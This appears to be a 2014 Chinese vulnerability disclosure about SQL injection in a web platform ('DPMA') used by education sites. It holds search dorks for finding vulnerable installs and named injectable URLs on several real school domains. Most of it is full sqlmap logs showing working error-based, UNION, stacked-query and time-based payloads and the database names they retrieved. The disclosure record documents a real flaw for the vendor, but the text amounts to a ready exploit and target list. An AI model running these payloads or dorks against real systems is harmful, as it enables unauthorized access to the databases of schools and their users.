2014-08-12: 细节已通知厂商并且等待厂商处理中 2014-08-17: 厂商已经确认,细节仅向厂商公开 2014-08-20: 细节向第三方安全合作伙伴开放 2014-10-11: 细节向核心白帽子及相关领域专家公开 2014-10-21: 细节向普通白帽子公开 2014-10-31: 细节向实习白帽子公开 2014-11-10: 细节向公众公开
rt
收录了那么多,来个首页吧
关键词
inurl:SPEVideoPage.aspx?KindSetID=inurl:SPENewsList.aspx?KindSetID=
注入1:http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPENewsList.aspx?KindSetID=1000001&sid=305001注入2:http://www.azxx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30获得约 311,000 条结果不知道是什么系统。。。举几个例子
注入地址:http://www.whwzyx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3180010017 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:21:41[06:21:41] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.whwzyx.net\session' as session file[06:21:41] [INFO] testing connection to the target url[06:21:42] [INFO] testing if the url is stable, wait a few seconds[06:21:43] [INFO] url is stable[06:21:43] [INFO] testing if GET parameter 'TID' is dynamic[06:21:43] [INFO] confirming that GET parameter 'TID' is dynamic[06:21:44] [INFO] GET parameter 'TID' is dynamic[06:21:44] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)[06:21:44] [INFO] testing sql injection on GET parameter 'TID'[06:21:44] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:22:05] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:22:06] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:22:06] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:22:16] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:22:16] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:22:27] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:22:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:22:27] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:22:28] [INFO] target url appears to have 11 columns in query[06:22:30] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 30 HTTP(s) requests:---Place: GETParameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=3180010017 AND 6066=CONVERT(INT,(CHAR(58)+CHAR(109)+CHAR(110)+CHAR(110)+CHAR(58)+(SELECT (CASE WHEN (6066=6066) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(112)+CHAR(122)+CHAR(108)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=3180010017 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(109)+CHAR(110)+CHAR(110)+CHAR(58)+CHAR(109)+CHAR(66)+CHAR(85)+CHAR(111)+CHAR(105)+CHAR(113)+CHAR(79)+CHAR(74)+CHAR(103)+CHAR(118)+CHAR(58)+CHAR(112)+CHAR(122)+CHAR(108)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=3180010017; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=3180010017 WAITFOR DELAY '0:0:5'-----[06:22:40] [INFO] testing Microsoft SQL Server[06:22:40] [INFO] confirming Microsoft SQL Server[06:22:41] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[06:22:41] [INFO] fetching database names[06:22:41] [INFO] the SQL query used returns 8 entries[06:22:41] [INFO] retrieved: "a1"[06:22:41] [INFO] retrieved: "bbt"[06:22:42] [INFO] retrieved: "DPMA"[06:22:42] [INFO] retrieved: "master"[06:22:42] [INFO] retrieved: "model"[06:22:42] [INFO] retrieved: "msdb"[06:22:43] [INFO] retrieved: "tempdb"[06:22:43] [INFO] retrieved: "Test"available databases [8]:[*] a1[*] bbt[*] DPMA[*] master[*] model[*] msdb[*] tempdb[*] Test[06:22:43] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 44 times[06:22:43] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.whwzyx.net'[*] shutting down at 06:22:43
注入地址:http://www.psgh.pudong-edu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3340010028 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:22:20[06:22:20] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.psgh.pudong-edu.sh.cn\session' as session file[06:22:20] [INFO] testing connection to the target url[06:22:21] [INFO] testing if the url is stable, wait a few seconds[06:22:22] [INFO] url is stable[06:22:22] [INFO] testing if GET parameter 'TID' is dynamic[06:22:22] [INFO] confirming that GET parameter 'TID' is dynamic[06:22:23] [INFO] GET parameter 'TID' is dynamic[06:22:23] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)[06:22:23] [INFO] testing sql injection on GET parameter 'TID'[06:22:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:22:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:22:42] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:22:42] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:22:53] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:22:53] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:23:03] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:23:03] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:23:03] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:23:04] [INFO] target url appears to have 11 columns in query[06:23:05] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 26 HTTP(s) requests:---Place: GETParameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=3340010028 AND 4680=CONVERT(INT,(CHAR(58)+CHAR(110)+CHAR(102)+CHAR(114)+CHAR(58)+(SELECT (CASE WHEN (4680=4680) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(102)+CHAR(102)+CHAR(120)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=3340010028 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(110)+CHAR(102)+CHAR(114)+CHAR(58)+CHAR(90)+CHAR(80)+CHAR(78)+CHAR(117)+CHAR(104)+CHAR(117)+CHAR(120)+CHAR(66)+CHAR(104)+CHAR(74)+CHAR(58)+CHAR(102)+CHAR(102)+CHAR(120)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=3340010028; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=3340010028 WAITFOR DELAY '0:0:5'-----[06:23:32] [INFO] testing Microsoft SQL Server[06:23:33] [INFO] confirming Microsoft SQL Server[06:23:33] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows Vistaweb application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0back-end DBMS: Microsoft SQL Server 2005[06:23:33] [INFO] fetching database names[06:23:33] [INFO] the SQL query used returns 6 entries[06:23:34] [INFO] retrieved: "dpma"[06:23:34] [INFO] retrieved: "GH"[06:23:34] [INFO] retrieved: "master"[06:23:34] [INFO] retrieved: "model"[06:23:34] [INFO] retrieved: "msdb"[06:23:35] [INFO] retrieved: "tempdb"available databases [6]:[*] dpma[*] GH[*] master[*] model[*] msdb[*] tempdb[06:23:35] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 38 times[06:23:35] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.psgh.pudong-edu.sh.cn'[*] shutting down at 06:23:35
注入地址:http://www.fstc.pdedu.sh.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3300010006 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:22:38[06:22:38] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.fstc.pdedu.sh.cn\session' as session file[06:22:38] [INFO] testing connection to the target url[06:22:38] [INFO] testing if the url is stable, wait a few seconds[06:22:40] [INFO] url is stable[06:22:40] [INFO] testing if GET parameter 'TID' is dynamic[06:22:40] [INFO] confirming that GET parameter 'TID' is dynamic[06:22:41] [INFO] GET parameter 'TID' is dynamic[06:22:41] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)[06:22:41] [INFO] testing sql injection on GET parameter 'TID'[06:22:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:23:34] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:23:35] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:23:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:23:45] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:23:45] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:23:55] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:23:55] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:23:56] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:23:57] [INFO] target url appears to have 11 columns in query[06:23:57] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 25 HTTP(s) requests:---Place: GETParameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=3300010006 AND 6013=CONVERT(INT,(CHAR(58)+CHAR(106)+CHAR(118)+CHAR(104)+CHAR(58)+(SELECT (CASE WHEN (6013=6013) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(101)+CHAR(108)+CHAR(116)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=3300010006 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(106)+CHAR(118)+CHAR(104)+CHAR(58)+CHAR(97)+CHAR(104)+CHAR(84)+CHAR(68)+CHAR(108)+CHAR(121)+CHAR(106)+CHAR(72)+CHAR(114)+CHAR(122)+CHAR(58)+CHAR(101)+CHAR(108)+CHAR(116)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=3300010006; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=3300010006 WAITFOR DELAY '0:0:5'-----[06:23:59] [INFO] testing Microsoft SQL Server[06:23:59] [INFO] confirming Microsoft SQL Server[06:24:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[06:24:00] [INFO] fetching database names[06:24:00] [INFO] the SQL query used returns 5 entries[06:24:01] [INFO] retrieved: "DPMA"[06:24:01] [INFO] retrieved: "master"[06:24:01] [INFO] retrieved: "model"[06:24:01] [INFO] retrieved: "msdb"[06:24:02] [INFO] retrieved: "tempdb"available databases [5]:[*] DPMA[*] master[*] model[*] msdb[*] tempdb[06:24:02] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 36 times[06:24:02] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.fstc.pdedu.sh.cn'[*] shutting down at 06:24:02
注入地址:http://www.azxx.net/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=3050010089 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:23:56[06:23:56] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.azxx.net\session' as session file[06:23:56] [INFO] testing connection to the target url[06:23:57] [INFO] testing if the url is stable, wait a few seconds[06:23:58] [INFO] url is stable[06:23:58] [INFO] testing if GET parameter 'TID' is dynamic[06:23:59] [INFO] confirming that GET parameter 'TID' is dynamic[06:24:00] [INFO] GET parameter 'TID' is dynamic[06:24:00] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)[06:24:00] [INFO] testing sql injection on GET parameter 'TID'[06:24:00] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:24:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:24:30] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:24:30] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:24:41] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:24:41] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:24:51] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:24:51] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:24:52] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:24:53] [INFO] target url appears to have 11 columns in query[06:24:55] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 29 HTTP(s) requests:---Place: GETParameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=3050010089 AND 5140=CONVERT(INT,(CHAR(58)+CHAR(118)+CHAR(117)+CHAR(103)+CHAR(58)+(SELECT (CASE WHEN (5140=5140) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(105)+CHAR(100)+CHAR(107)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=3050010089 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(118)+CHAR(117)+CHAR(103)+CHAR(58)+CHAR(111)+CHAR(81)+CHAR(109)+CHAR(119)+CHAR(103)+CHAR(67)+CHAR(78)+CHAR(97)+CHAR(89)+CHAR(107)+CHAR(58)+CHAR(105)+CHAR(100)+CHAR(107)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=3050010089; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=3050010089 WAITFOR DELAY '0:0:5'-----[06:24:56] [INFO] testing Microsoft SQL Server[06:24:56] [INFO] confirming Microsoft SQL Server[06:24:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[06:24:57] [INFO] fetching database names[06:24:58] [INFO] the SQL query used returns 7 entries[06:24:58] [INFO] retrieved: "azxxweb"[06:24:58] [INFO] retrieved: "dpma"[06:24:58] [INFO] retrieved: "dss"[06:24:59] [INFO] retrieved: "master"[06:24:59] [INFO] retrieved: "model"[06:24:59] [INFO] retrieved: "msdb"[06:24:59] [INFO] retrieved: "tempdb"available databases [7]:[*] azxxweb[*] dpma[*] dss[*] master[*] model[*] msdb[*] tempdb[06:24:59] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 42 times[06:24:59] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\www.azxx.net'[*] shutting down at 06:24:59
注入地址:http://yanxiu.ksedu.cn/dpma/FWeb/WorkRoomWeb/Web/Index.aspx?TID=1010300035 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:25:16[06:25:16] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\yanxiu.ksedu.cn\session' as session file[06:25:16] [INFO] testing connection to the target url[06:25:17] [INFO] testing if the url is stable, wait a few seconds[06:25:20] [INFO] url is stable[06:25:20] [INFO] testing if GET parameter 'TID' is dynamic[06:25:21] [INFO] confirming that GET parameter 'TID' is dynamic[06:25:22] [INFO] GET parameter 'TID' is dynamic[06:25:22] [INFO] heuristic test shows that GET parameter 'TID' might be injectable (possible DBMS: Microsoft SQL Server)[06:25:22] [INFO] testing sql injection on GET parameter 'TID'[06:25:22] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:25:32] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:25:32] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:25:32] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:25:43] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:25:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:25:53] [INFO] GET parameter 'TID' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:25:53] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:25:54] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:25:55] [INFO] target url appears to have 11 columns in query[06:25:57] [INFO] GET parameter 'TID' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'TID' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 34 HTTP(s) requests:---Place: GETParameter: TID Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: TID=1010300035 AND 1299=CONVERT(INT,(CHAR(58)+CHAR(116)+CHAR(115)+CHAR(106)+CHAR(58)+(SELECT (CASE WHEN (1299=1299) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(111)+CHAR(104)+CHAR(102)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: TID=1010300035 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(116)+CHAR(115)+CHAR(106)+CHAR(58)+CHAR(68)+CHAR(118)+CHAR(97)+CHAR(107)+CHAR(89)+CHAR(69)+CHAR(69)+CHAR(97)+CHAR(84)+CHAR(79)+CHAR(58)+CHAR(111)+CHAR(104)+CHAR(102)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: TID=1010300035; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: TID=1010300035 WAITFOR DELAY '0:0:5'-----[06:26:03] [INFO] testing Microsoft SQL Server[06:26:03] [INFO] confirming Microsoft SQL Server[06:26:03] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[06:26:03] [INFO] fetching database names[06:26:03] [INFO] the SQL query used returns 5 entries[06:26:04] [INFO] retrieved: "DPMA"[06:26:04] [INFO] retrieved: "master"[06:26:04] [INFO] retrieved: "model"[06:26:04] [INFO] retrieved: "msdb"[06:26:04] [INFO] retrieved: "tempdb"available databases [5]:[*] DPMA[*] master[*] model[*] msdb[*] tempdb[06:26:04] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 45 times[06:26:04] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\yanxiu.ksedu.cn'[*] shutting down at 06:26:04
注入地址:http://szxy.ncjy.net/DPMA/FWeb/WorkRoomWeb/Web/index.aspx?tid=1000020013 sqlmap/1.0-dev - automatic SQL injection and database takeover tool http://www.sqlmap.org[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicablelocal, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program[*] starting at 06:25:38[06:25:38] [INFO] using 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\szxy.ncjy.net\session' as session file[06:25:38] [INFO] testing connection to the target url[06:25:38] [INFO] testing if the url is stable, wait a few seconds[06:25:40] [INFO] url is stable[06:25:40] [INFO] testing if GET parameter 'tid' is dynamic[06:25:41] [INFO] confirming that GET parameter 'tid' is dynamic[06:25:41] [INFO] GET parameter 'tid' is dynamic[06:25:42] [INFO] heuristic test shows that GET parameter 'tid' might be injectable (possible DBMS: Microsoft SQL Server)[06:25:42] [INFO] testing sql injection on GET parameter 'tid'[06:25:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'parsed error message(s) showed that the back-end DBMS could be Microsoft SQL Server. Do you want to skip test payloads specific for other DBMSes? [Y/n][06:25:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'[06:25:46] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable[06:25:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'[06:25:57] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase stacked queries' injectable[06:25:57] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'[06:26:08] [INFO] GET parameter 'tid' is 'Microsoft SQL Server/Sybase time-based blind' injectable[06:26:08] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'[06:26:08] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for UNION query injection technique[06:26:10] [INFO] target url appears to have 11 columns in query[06:26:11] [INFO] GET parameter 'tid' is 'Generic UNION query (NULL) - 1 to 10 columns' injectableGET parameter 'tid' is vulnerable. Do you want to keep testing the others (if any)? [y/N]sqlmap identified the following injection points with a total of 27 HTTP(s) requests:---Place: GETParameter: tid Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: tid=1000020013 AND 4963=CONVERT(INT,(CHAR(58)+CHAR(119)+CHAR(103)+CHAR(117)+CHAR(58)+(SELECT (CASE WHEN (4963=4963) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(58)+CHAR(115)+CHAR(100)+CHAR(117)+CHAR(58))) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: tid=1000020013 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, CHAR(58)+CHAR(119)+CHAR(103)+CHAR(117)+CHAR(58)+CHAR(72)+CHAR(102)+CHAR(86)+CHAR(75)+CHAR(68)+CHAR(101)+CHAR(85)+CHAR(98)+CHAR(77)+CHAR(76)+CHAR(58)+CHAR(115)+CHAR(100)+CHAR(117)+CHAR(58), NULL, NULL, NULL, NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: tid=1000020013; WAITFOR DELAY '0:0:5';-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: tid=1000020013 WAITFOR DELAY '0:0:5'-----[06:26:13] [INFO] testing Microsoft SQL Server[06:26:14] [INFO] confirming Microsoft SQL Server[06:26:14] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windowsweb application technology: ASP.NET, Nginx, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2005[06:26:14] [INFO] fetching database names[06:26:15] [INFO] the SQL query used returns 5 entries[06:26:15] [INFO] retrieved: "DPMA"[06:26:15] [INFO] retrieved: "master"[06:26:15] [INFO] retrieved: "model"[06:26:16] [INFO] retrieved: "msdb"[06:26:16] [INFO] retrieved: "tempdb"available databases [5]:[*] DPMA[*] master[*] model[*] msdb[*] tempdb[06:26:16] [WARNING] HTTP error codes detected during testing:500 (Internal Server Error) - 38 times[06:26:16] [INFO] Fetched data logged to text files under 'C:\Documents and Settings\Administrator\桌面\sqlmap_GUI汉化版(1)\sqlmap GUI汉化版\rar\output\szxy.ncjy.net'[*] shutting down at 06:26:16
\
注入点2:http://www.whwzyx.net/dpma/FWeb/SPEWeb/Web/SPEVideoPage.aspx?KindSetID=30002&VideoID=1026&sid=318001function
过滤。
危害等级:高
漏洞Rank:16
确认时间:2014-08-17 13:06
暂无